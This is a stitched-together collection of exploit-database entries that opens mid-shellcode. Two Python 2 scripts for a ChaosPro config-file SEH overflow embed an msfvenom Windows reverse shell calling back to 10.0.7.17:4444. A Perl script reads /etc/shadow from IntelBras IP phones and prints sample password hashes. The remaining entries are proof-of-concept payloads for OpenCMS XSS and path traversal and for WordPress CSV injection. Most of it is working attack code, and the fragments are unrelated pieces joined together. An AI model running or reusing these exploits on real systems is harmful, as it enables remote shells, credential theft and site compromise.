    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#badchars
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# stack alignment
# single-byte instruction stubs named after what the author says they do
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"
#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522
#junk += alpha_numeric_hex
# Total pad so that three 126-byte working sections plus the jump stubs fit
# before the SEH overwrite; each section below is padded back up to 126 bytes.
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)
# baby nopsled
junk += "A" * 9
# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp
# Each "section" below is zero_eax + three 5-byte \x2d (sub) sequences +
# push_eax; the commented 4-byte value is what the author says lands on the
# stack after the three subtractions.
# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
junk += "A" * (
    126
    - 9 # nopsled
    # aligning the stack
    - len(zero_eax)
    - len(push_esp)
    - len(pop_eax)
    - len(align_stack)
    - len(push_eax)
    - len(pop_esp)
    # first set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    # second set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    # third set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
)
# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
junk += "A" * (
    126 # amount of room before we need to jump
    - 3 # baby nopsled
    # part one of fourth set of bytes going onto the stack
    - len(zero_eax)
    # part two of fourth sec of bytes going onto the stack
    - 15
    - len(push_eax)
    # fifth set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    # sixth set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    # seventh set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    - 4 # baby nopsled
    - len(jmpback80)
)
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
# baby nopsled
junk += "AAAA"
# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
junk += "A" * (
    126 # amount of room before we need to jump
    - len(jmpback80)
    - 4 # baby nopsled
    # eighth set of bytes going onto the stack
    # eighth section
    - len(zero_eax)
    - 15
    - len(push_eax)
    # ninth set of bytes going onto the stack
    - len(zero_eax)
    - 15
    - len(push_eax)
    - len(jmpforward06)
)
# Third jump stub pair (the "First" wording below is a copy-paste artifact)
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)
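#!C:\Python27\python.exe
# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#
# Generates a ChaosPro.cfg whose oversized "ProjectPath" value overflows the
# config parser and overwrites the SEH record. The handler address is a
# pop/pop/ret; the short jumps placed just before it lead to an egghunter,
# which locates the "T00WT00W"-tagged reverse shell stored on the "Username"
# line (layout details: see the blog post above).
#
# NOTE(review): this is Python 2 code (see the shebang). The shellcode is held
# in native str literals; under Python 3 open(..., 'w') would UTF-8-encode
# every byte >= 0x80 and corrupt the payload. Run it with Python 2.
import sys

# Default output location of the crafted config; the first command-line
# argument overrides it.
DEFAULT_OUT = 'C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg'

# Short jumps (inc eax; jnz rel8). The -0x80 one jumps backwards to give us
# room to reach the egghunter; the +0x06 one skips forward over the record.
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"

# Egghunter: scans memory for the egg "T00W" repeated twice and jumps to the
# code that follows it.
egghunter = (
    "\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
    "\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
    "\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
    "\xaf\x75\xe4\xff\xe7"
)

# The egg, followed by the reverse shell the egghunter will land on.
payload = "T00WT00W"
payload += (
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
    # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
    "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
    "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
    "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
    "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
    "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
    "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
    "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
    "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
    "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
    "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
    "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
    "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
    "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
    "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
    "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
    "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
    "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
    "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
    "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
    "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
    "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
    "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
    "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
    "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
    "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
    "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
    "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
    "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
    "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
    "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
    "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
    "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
    "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
    "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
    "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
    "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
    "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
    "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
    "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
    "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
    "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
    "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

# Bytes from the start of the ProjectPath value up to (not including) the
# SEH handler address.
OVERFLOW_LEN = 2705

# Bytes of the overwritten SEH handler that are written explicitly; the
# original author notes the address ends in 0x00, which is not written here
# (presumably supplied by the parser's string terminator -- see blog post).
SEH_HANDLER = "\x50\x49\x40"


def _build_config():
    """Return the complete ChaosPro.cfg contents as a str.

    Line 1 ("Username") carries the egg plus reverse shell for the egghunter
    to find; line 2 ("ProjectPath") carries the overflow: a filler of 'A's,
    the egghunter, the two short jumps and finally the pop/pop/ret address.
    """
    cfg = "Username " + payload + "\n"
    cfg += "ProjectPath "
    filler = "A" * (OVERFLOW_LEN - len(jmpforward06) - len(jmpback80) - len(egghunter))
    overflow = filler + egghunter + jmpforward06 + jmpback80 + SEH_HANDLER
    return cfg + overflow


if __name__ == '__main__':
    out_path = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_OUT
    junk = _build_config()
    # Guard against accidental edits shifting the SEH overwrite: the
    # ProjectPath value must be exactly OVERFLOW_LEN bytes plus the handler.
    value_len = len(junk) - len("Username " + payload + "\n" + "ProjectPath ")
    assert value_len == OVERFLOW_LEN + len(SEH_HANDLER), value_len
    # write the evil file (text mode, as the original; the payload contains
    # no newline bytes so no translation occurs inside the shellcode)
    with open(out_path, 'w') as the_file:
        the_file.write(junk)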
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235
1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability is triggered through the X-Forwarded-For request header, whose value is reflected into the login page without encoding, as shown in the following request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```
Extended POCs: https://aetsu.github.io/OpenCms
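#!/usr/bin/perl -w
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
# Todor Donev 2019 (c) <todor.donev at gmail.com>
#
# NOTE(review): the request below is sent with HTTP Basic credentials
# (defaulting to user:user) and the script aborts on a 401, so at least the
# device's default web credentials are relied upon. Whether the endpoint also
# answers without any credentials is not demonstrated by this script.
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
# # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
# # ========================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # ========================================================================================================
# # > Authorization => Basic dXNlcjp1c2Vy
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
# # > Content-Type => application/x-www-form-urlencoded
# # < Accept-Ranges => bytes
# # < Server => SIPPhone
# # < Content-Type => text/html;charset=UTF-8
# # < Expires => -1
# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
# # < Client-Peer => 192.168.1.1
# # < Client-Response-Num => 1
# # ========================================================================================================
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
# # ========================================================================================================
# [test@localhost intelbras]$
#
# Simple Mode:
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

# Positional arguments: base URL of the phone's web interface, file to read,
# HTTP Basic username and password (defaults: /etc/shadow, user, user).
my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";

# Usage is printed when no http(s) URL was given.
if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
    exit;
}

# The usage examples show a trailing slash on the base URL; strip it so the
# request path does not become "//cgi-bin/...".
$host =~ s{/+$}{};

# Random browser User-Agent; certificate errors are ignored because these
# devices typically use self-signed certificates.
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

# The CGI evaluates a command string; dumpConfigFile() returns the named file.
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);

print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

# The device echoes the requested path in front of the file contents; treat
# the path as a literal (\Q...\E) so '.' in names such as .htpasswd is not a
# regex wildcard, then strip it before printing.
if ($response->content =~ m/\Q$file\E/){
    my $content = $response->content;
    $content =~ s/\Q$file\E//g;
    $content =~ s/^\n+//;
    print $content;
    print "\n# ========================================================================================================\n";
    exit;
} else {
    print "# Exploit failed or full path is wrong..\n";
    exit;
}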
# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection
# Google Dork: inurl:"/wp-content/plugins/event-tickets"
# Date: 09-01-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://tri.be/
# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
# Version: Up to and including v4.10.7.1
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# Software description:
Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.
# Technical Details & Impact:
A crafted attendee name is written into the exported CSV without sanitisation, so opening the export in a spreadsheet application can execute an attacker-supplied command on the logged-in user's computer. The spreadsheet application does show a warning before running the embedded command, but users frequently accept it because the file comes from a trusted source.
# POC
1. Visit RSVP ticket enabled page
2. In Full name section add payload for CSV injection e.g.
=cmd|'/C ping -t 127.0.0.1'!A0
3. Login into WordPress and visit event details in All Post> Ticketed > Attendees.
4. Export Attendees list (.csv format).
5. Opening the file will execute malicious payload (command) on user system
# Timeline
02-08-2019 - Vulnerability discovered
02-08-2019 - Vendor contacted
02-08-2019 - Vendor responded
02-08-2019 - Detailed report shared
02-18-2019 - Contacted vendor about the status of a fix; no response
08-26-2019 - Full disclosure timeline given without any response
09-01-2019 - Full Disclosure
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237
For the tests, I used the payloads:
```
..%2f..%2fWEB-INF%2flogs%2fopencms.log
..%2f..%2fWEB-INF%2fweb.xml
```
1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```
3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```
Extended POCs: https://aetsu.github.io/OpenCms
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236
1. In Site Management > New site (Stored XSS):
- Affected resource title.0:
POC:
```
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
```
2. In Treeview (Reflected XSS):
- Affected resource type:
POC:
```
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
```
3. In Workspace tools > Login message (Stored XSS):
- Affected resource message.0:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=<svg
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
```
4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource name.0:
POC:
